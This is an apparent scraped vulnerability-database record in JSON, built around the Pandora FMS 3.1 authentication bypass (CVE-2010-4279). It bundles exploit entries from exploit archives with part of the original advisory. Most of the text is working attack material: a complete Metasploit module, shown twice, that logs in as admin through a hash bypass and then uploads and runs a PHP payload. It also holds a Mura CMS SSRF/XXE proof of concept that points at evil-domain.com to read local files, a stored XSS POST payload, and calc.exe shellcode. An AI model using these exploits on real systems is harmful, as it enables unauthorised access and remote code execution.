\nSept 2010: Confirmation that the fix will be released on October \nOct 2010: PandoraFMS security patch for 3.1 version released \nOct 2010: Request for CVE numbers \nNov 2010: PandoraFMS version 3.1.1 released \nNov 2010: Disclosure of this advisory \n \n \n[+] References \n \nOfficial PandoraFMS site: http://pandorafms.org/ \nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/ \nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS \nCommon Vulnerability Scoring System (CVSS) v2 calculator: \nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 \nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/ \n \n \n[+] Credits \n \nThese vulnerabilities has been discovered by Juan Galiana Lara - \n@jgaliana - http://juangaliana.blogspot.com/ \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.10 (GNU/Linux) \n \niQIcBAEBAgAGBQJM9NIMAAoJEJaV5RMdiDI75QEP/jc/7zYJCFUTCCzfbVEOgECp \n//N5GUaV/TdIVCDcGKu+/09kbDewhU/hwcxNEH7H1EC80Xv2qx1gkrvcHiDsbITY \nsCrMd2JfOsT2xAFPYbuiD5QLvDcqjSj/rgVxjJFvMfe21HjYq7JmPl48jY9pvhXL \n8zG6qarJ6lKD+pSfhFeI3OgZiNF0Ws5yzh3Byq4aeRcIGWzLahYZ7upyHnAsDon8 \nb8EqZao0gKvkWVZHEPm13WtLfZvwly6KhBkmgfaALJVO4WZ7dEHyy6/obokaYzgc \nnMA2ZiTyhXTTNlRtcFvbvU5clglu1eZr/hnEvi4L7UIGg00HkdqqiDMl6JmX6QWi \nClUihkcSMxfgndDYib1Xebhghe+T6w0GLbUi40A40ByOrGAdU8UF6bo4Mh8EIgkX \nQrWR6M/nr+3GRf+LWgekKozqqFQNDQFeYq5qv16jGRiqO+Rn9yFjlqcjGY0Qx6DO \nzVY23OaXXjYkNIfHO+HX4pVhyomrg/oa9rLfjzx8tEieRTZDPDgyn33LP11IzE61 \nJN8T77VhuwkkYf1v6kzqvbzqNmkTslvk1PR38HUCGY+Sm6pejUsVyIWnt2goqprW \ntzbnxGOqmDHFfQ66F0HZkvY8eR0BRuaYZnYNSbzf65F0WmLh6usFOZfrWaZ9baSG \nPee6VRKILvel2NRtvF+3 \n=Adj0 \n-----END PGP SIGNATURE----- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/96259/pandorafms-sqltraversal.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-21T01:34:02", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2017-10-25T00:00:00", "published": "2017-10-25T00:00:00", "href": "https://0day.today/exploit/description/28866", "id": "1337DAY-ID-28866", "type": "zdt", "title": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection Vulnerabilities", "sourceData": "# Exploit Title: Mura CMS before 6.2 SSRF + XXE\r\n# Date: 30-10-2017\r\n# Exploit Author: Anthony Cole\r\n# Vendor Homepage: http://www.getmura.com/\r\n# Version: before 6.2\r\n# Contact: http://twitter.com/acole76\r\n# Website: http://twitter.com/acole76\r\n# Tested on: Windows 2008 w/ Coldfusion 8\r\n# CVE: CVE-2017-15639\r\n# Category: webapps\r\n \r\n1. Description\r\n \r\nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.\r\n \r\n \r\n2. Proof of Concept\r\n \r\nvulnerable file is on github, line 50:\r\nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm\r\n \r\nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500\r\n \r\nExplanation of params\r\n siteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\".\r\n rssurl - This is the URL you want Mura CMS to call out to.\r\n \r\nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80\r\n \r\nThen create a file:\r\n \r\n<?xml version=\"1.0\" ?>\r\n<!DOCTYPE rss [\r\n <!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\">\r\n]>\r\n \r\n<rss version=\"2.0\">\r\n<channel>\r\n <title>title</title>\r\n <link>link</link>\r\n <description>description</description>\r\n <generator>http://www.getmura.com</generator>\r\n <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>\r\n <language>en-us</language>\r\n <item>\r\n <title>Item title</title>\r\n <link>http://host/</link>\r\n <guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid>\r\n <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>\r\n <description>&send;</description>\r\n </item>\r\n</channel>\r\n</rss>\r\n \r\n3. Solution:\r\n \r\ndelete readRSS.cfm from the server.\n\n# 0day.today [2018-02-20] #", "sourceHref": "https://0day.today/exploit/28866", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-01T23:44:02", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-08-01T00:00:00", "published": "2016-08-01T00:00:00", "id": "1337DAY-ID-25206", "href": "https://0day.today/exploit/description/25206", "type": "zdt", "title": "WordPress WP Live Chat Support 6.2.03 Plugin - Persistent Cross-Site Scripting", "sourceData": "Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin\r\n \r\nAbstract\r\n \r\nA stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\n \r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\n \r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0010\r\n \r\nTested versions\r\n \r\nThis issue was successfully tested on WP Live Chat Support WordPress Plugin version 6.2.03.\r\n \r\nFix\r\n \r\nThis issue is resolved in WP Live Chat Support version 6.2.04.\r\n \r\nIntroduction\r\n \r\nWP Live Chat Support allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\n \r\nThe vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602):\r\n \r\nwp-live-chat-support/wp-live-chat-support.php:\r\n \r\n600 if ($_POST['action'] == \"wplc_user_send_offline_message\") {\r\n601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }\r\n602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }\r\n603 do_action(\"wplc_hook_offline_message\",array(\r\n604 \"cid\"=>$_POST['cid'],\r\n605 \"name\"=>$_POST['name'],\r\n606 \"email\"=>$_POST['email'],\r\n607 \"url\"=>get_site_url(),\r\n608 \"msg\"=>$_POST['msg']\r\n609 )\r\n610 );\r\n611 }\r\n \r\nwp-live-chat-support/functions.php:\r\n \r\n1206 function wplc_store_offline_message($name, $email, $message){\r\n1207 global $wpdb;\r\n1208 global $wplc_tblname_offline_msgs;\r\n1209 \r\n1210 $wplc_settings = get_option('WPLC_SETTINGS');\r\n1211 \r\n1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){\r\n1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {\r\n1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];\r\n1215 } else {\r\n1216 $ip_address = $_SERVER['REMOTE_ADDR'];\r\n1217 }\r\n1218 $offline_ip_address = $ip_address;\r\n1219 } else {\r\n1220 $offline_ip_address = \"\";\r\n1221 }\r\n1222 \r\n1223 \r\n1224 $ins_array = array(\r\n1225 'timestamp' => current_time('mysql'),\r\n1226 'name' => $name,\r\n1227 'email' => $email,\r\n1228 'message' => $message,\r\n1229 'ip' => $offline_ip_address,\r\n1230 'user_agent' => $_SERVER['HTTP_USER_AGENT']\r\n1231 );\r\n1232 \r\n1233 $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );\r\n1234 return;\r\n1235 }\r\n \r\nThe vulnerability can be exploited using a specially crafted POST request. The victim needs view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted taht the offline message functionality is available even if there is a logged on chat user present.\r\n \r\nProof of concept\r\n \r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: <target>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 361\r\nConnection: close\r\n \r\naction=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script>\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25206"}, {"lastseen": "2018-02-06T09:12:27", "bulletinFamily": "exploit", "description": "This Metasploit module exploits an authentication bypass vulnerability in Pandora version 3.1 as disclosed by Juan Galiana Lara. It also integrates with the built-in pandora upload which allows a user to upload arbitrary files to the '/images/' directory. This Metasploit module was created as an exercise in the Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix.", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "id": "1337DAY-ID-23084", "href": "https://0day.today/exploit/description/23084", "type": "zdt", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload Vulnerabilities", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in Pandora v3.1 as\r\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\r\n upload which allows a user to upload arbitrary files to the '/images/' directory.\r\n\r\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\r\n that was facilitated by egypt and mubix.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Juan Galiana Lara', # Vulnerability discovery\r\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\r\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\r\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\r\n '_flood <freshbones[at]gmail.com>', # Metasploit module\r\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\r\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2010-4279'],\r\n ['OSVDB', '69549'],\r\n ['BID', '45112']\r\n ],\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Automatic Targeting', { 'auto' => true }]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Nov 30 2010\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n base = target_uri.path\r\n\r\n # retrieve software version from login page\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php')\r\n })\r\n if res and res.code == 200\r\n #Tested on v3.1 Build PC100609 and PC100608\r\n if res.body.include?(\"v3.1 Build PC10060\")\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Pandora\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue ::Rex::ConnectionError\r\n print_error(\"#{peer} - Connection failed\")\r\n end\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # upload a payload using the pandora built-in file upload\r\n def upload(base, file, cookies)\r\n data = Rex::MIME::Message.new\r\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\r\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\r\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\r\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\r\n data_post = data.to_s\r\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'cookie' => cookies,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'vars_get' => {\r\n 'sec' => 'gsetup',\r\n 'sec2' => 'godmode/setup/file_manager',\r\n },\r\n 'data' => data_post\r\n })\r\n\r\n register_files_for_cleanup(@fname)\r\n return res\r\n end\r\n\r\n def exploit\r\n\r\n base = target_uri.path\r\n @fname = \"#{rand_text_numeric(7)}.php\"\r\n cookies = \"\"\r\n\r\n # bypass authentication and get session cookie\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'vars_get' => {\r\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\r\n 'loginhash_user' => 'admin',\r\n 'loginhash' => '1',\r\n },\r\n })\r\n\r\n # fix if logic\r\n if res and res.code == 200\r\n if res.body.include?(\"Logout\")\r\n cookies = res.get_cookies\r\n print_status(\"Login Bypass Successful\")\r\n print_status(\"cookie monster = \" + cookies)\r\n else\r\n fail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\")\r\n end\r\n end\r\n\r\n # upload PHP payload to images/[fname]\r\n print_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\")\r\n php = %Q|<?php #{payload.encoded} ?>|\r\n begin\r\n res = upload(base, php, cookies)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - File uploaded successfully\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\r\n end\r\n\r\n # retrieve and execute PHP payload\r\n print_status(\"#{peer} - Executing payload (images/#{@fname})\")\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\r\n }, 1)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n end\r\nend\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23084"}, {"lastseen": "2018-03-28T05:24:06", "bulletinFamily": "exploit", "description": "Exploit for win32 platform in category shellcode", "modified": "2010-03-12T00:00:00", "published": "2010-03-12T00:00:00", "id": "1337DAY-ID-11274", "href": "https://0day.today/exploit/description/11274", "type": "zdt", "title": "win32/xp sp3 (Ita) calc.exe shellcode 36 bytes", "sourceData": "==============================================\r\nwin32/xp sp3 (Ita) calc.exe shellcode 36 bytes\r\n==============================================\r\n\r\n/*\r\nTitle: Windows XP Professional SP2 ita calc.exe shellcode 36 bytes\r\nType: Shellcode\r\nAuthor: Stoke\r\nPlatform: win32\r\nTested on: Windows XP Professional SP2 ita\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\nint main() {\r\nchar shell[] = \"\\xeb\\x16\\x5b\\x31\\xc0\\x50\\x53\\xbb\"\r\n\"\\x8d\\x15\\x86\\x7c\\xff\\xd3\\x31\\xc0\"\r\n\"\\x50\\xbb\\xea\\xcd\\x81\\x7c\\xff\\xd3\"\r\n\"\\xe8\\xe5\\xff\\xff\\xff\\x63\\x61\\x6c\"\r\n\"\\x63\\x2e\\x65\\x78\\x65\";\r\nprintf(\"Shellcode lenght %d\\n\", strlen(shell));\r\ngetchar();\r\n((void (*)()) shell)();\r\nreturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11274"}], "exploitdb": [{"lastseen": "2017-10-25T16:30:50", "bulletinFamily": "exploit", "description": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection. CVE-2017-15639. Webapps exploit for CFM platform", "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "id": "EDB-ID:43045", "href": "https://www.exploit-db.com/exploits/43045/", "type": "exploitdb", "title": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection", "sourceData": "# Exploit Title: Mura CMS before 6.2 SSRF + XXE\r\n# Date: 30-10-2017\r\n# Exploit Author: Anthony Cole\r\n# Vendor Homepage: http://www.getmura.com/\r\n# Version: before 6.2\r\n# Contact: http://twitter.com/acole76\r\n# Website: http://twitter.com/acole76\r\n# Tested on: Windows 2008 w/ Coldfusion 8\r\n# CVE: CVE-2017-15639\r\n# Category: webapps\r\n \r\n1. Description\r\n \r\nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.\r\n \r\n \r\n2. Proof of Concept\r\n\r\nvulnerable file is on github, line 50:\r\nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm\r\n \r\nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500\r\n\r\nExplanation of params\r\n\tsiteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\".\r\n\trssurl - This is the URL you want Mura CMS to call out to.\r\n\t\r\nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80\r\n\t\r\nThen create a file:\r\n\r\n<?xml version=\"1.0\" ?>\r\n<!DOCTYPE rss [\r\n <!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\">\r\n]>\r\n\r\n<rss version=\"2.0\">\r\n<channel>\r\n <title>title</title>\r\n <link>link</link>\r\n <description>description</description>\r\n <generator>http://www.getmura.com</generator>\r\n <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>\r\n <language>en-us</language>\r\n <item>\r\n <title>Item title</title>\r\n <link>http://host/</link>\r\n <guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid>\r\n <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>\r\n <description>&send;</description>\r\n </item>\r\n</channel>\r\n</rss>\r\n \r\n3. Solution:\r\n\r\ndelete readRSS.cfm from the server.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43045/"}, {"lastseen": "2016-02-04T01:53:48", "bulletinFamily": "exploit", "description": "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability. CVE-2010-4279. Remote exploit for php platform", "modified": "2015-01-08T00:00:00", "published": "2015-01-08T00:00:00", "id": "EDB-ID:35731", "href": "https://www.exploit-db.com/exploits/35731/", "type": "exploitdb", "title": "Pandora 3.1 - Auth Bypass and Arbitrary File Upload Vulnerability", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in Pandora v3.1 as\r\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\r\n upload which allows a user to upload arbitrary files to the '/images/' directory.\r\n\r\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\r\n that was facilitated by egypt and mubix.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Juan Galiana Lara', # Vulnerability discovery\r\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\r\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\r\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\r\n '_flood <freshbones[at]gmail.com>', # Metasploit module\r\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\r\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2010-4279'],\r\n ['OSVDB', '69549'],\r\n ['BID', '45112']\r\n ],\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Automatic Targeting', { 'auto' => true }]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Nov 30 2010\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n base = target_uri.path\r\n\r\n # retrieve software version from login page\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php')\r\n })\r\n if res and res.code == 200\r\n #Tested on v3.1 Build PC100609 and PC100608\r\n if res.body.include?(\"v3.1 Build PC10060\")\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Pandora\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue ::Rex::ConnectionError\r\n vprint_error(\"#{peer} - Connection failed\")\r\n end\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # upload a payload using the pandora built-in file upload\r\n def upload(base, file, cookies)\r\n data = Rex::MIME::Message.new\r\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\r\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\r\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\r\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\r\n data_post = data.to_s\r\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'cookie' => cookies,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'vars_get' => {\r\n 'sec' => 'gsetup',\r\n 'sec2' => 'godmode/setup/file_manager',\r\n },\r\n 'data' => data_post\r\n })\r\n\r\n register_files_for_cleanup(@fname)\r\n return res\r\n end\r\n\r\n def exploit\r\n\r\n base = target_uri.path\r\n @fname = \"#{rand_text_numeric(7)}.php\"\r\n cookies = \"\"\r\n\r\n # bypass authentication and get session cookie\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'vars_get' => {\r\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\r\n 'loginhash_user' => 'admin',\r\n 'loginhash' => '1',\r\n },\r\n })\r\n\r\n # fix if logic\r\n if res and res.code == 200\r\n if res.body.include?(\"Logout\")\r\n cookies = res.get_cookies\r\n print_status(\"Login Bypass Successful\")\r\n print_status(\"cookie monster = \" + cookies)\r\n else\r\n fail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\")\r\n end\r\n end\r\n\r\n # upload PHP payload to images/[fname]\r\n print_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\")\r\n php = %Q|<?php #{payload.encoded} ?>|\r\n begin\r\n res = upload(base, php, cookies)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - File uploaded successfully\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\r\n end\r\n\r\n # retrieve and execute PHP payload\r\n print_status(\"#{peer} - Executing payload (images/#{@fname})\")\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\r\n }, 1)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35731/"}, {"lastseen": "2016-02-01T22:14:12", "bulletinFamily": "exploit", "description": "Pandora Fms <= 3.1 - Authentication Bypass. CVE-2010-4279. Webapps exploit for php platform", "modified": "2010-11-30T00:00:00", "published": "2010-11-30T00:00:00", "id": "EDB-ID:15639", "href": "https://www.exploit-db.com/exploits/15639/", "type": "exploitdb", "title": "Pandora Fms <= 3.1 - Authentication Bypass", "sourceData": "[+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n\"hash login\" authentication process. This kind of authentication method\r\nworks providing a username and a hash. The issue could be exploited\r\nremotely providing a username and the md5 of it when\r\n$config['loginhash_pwd'] is empty, that in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if (! isset ($config['id_user']) && isset ($_GET[\"loginhash\"])) {\r\n138 $loginhash_data = get_parameter(\"loginhash_data\", \"\");\r\n139 $loginhash_user = get_parameter(\"loginhash_user\", \"\");\r\n140\r\n141 if ($loginhash_data ==\r\nmd5($loginhash_user.$config[\"loginhash_pwd\"])) {\r\n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);\r\n143 $_SESSION['id_usuario'] = $loginhash_user;\r\n144 $config[\"id_user\"] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\r\n\r\nGot it! admin! :)\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1) Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 ( $string . $KEY) is\r\nencouraged for security purposes.\r\n\r\nSnippet of code (index.php, version 3.1.1):\r\n\r\n145 // Hash login process\r\n(...)\r\n150 if ($config[\"loginhash_pwd\"] != \"\" && $loginhash_data ==\r\nmd5($loginhash_user.$config[\"loginhash_pwd\"])) {\r\n\r\nIn line 150, use\r\nhash_hmac(\"sha256\",$loginhash_user,$config[\"loginhash_pwd\"]), instead of\r\nmd5($lioginhash_user.$config[\"loginhash_pwd\"])\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get 